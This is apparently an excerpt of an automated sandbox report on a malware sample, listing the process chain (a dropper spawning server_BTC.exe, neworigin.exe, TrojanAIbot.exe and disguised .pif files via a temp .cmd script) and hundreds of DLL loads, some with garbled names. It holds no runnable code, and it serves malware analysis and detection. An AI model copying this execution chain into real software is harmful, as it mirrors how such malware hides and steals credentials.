Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBC1D.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\2jbMIxCFsK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
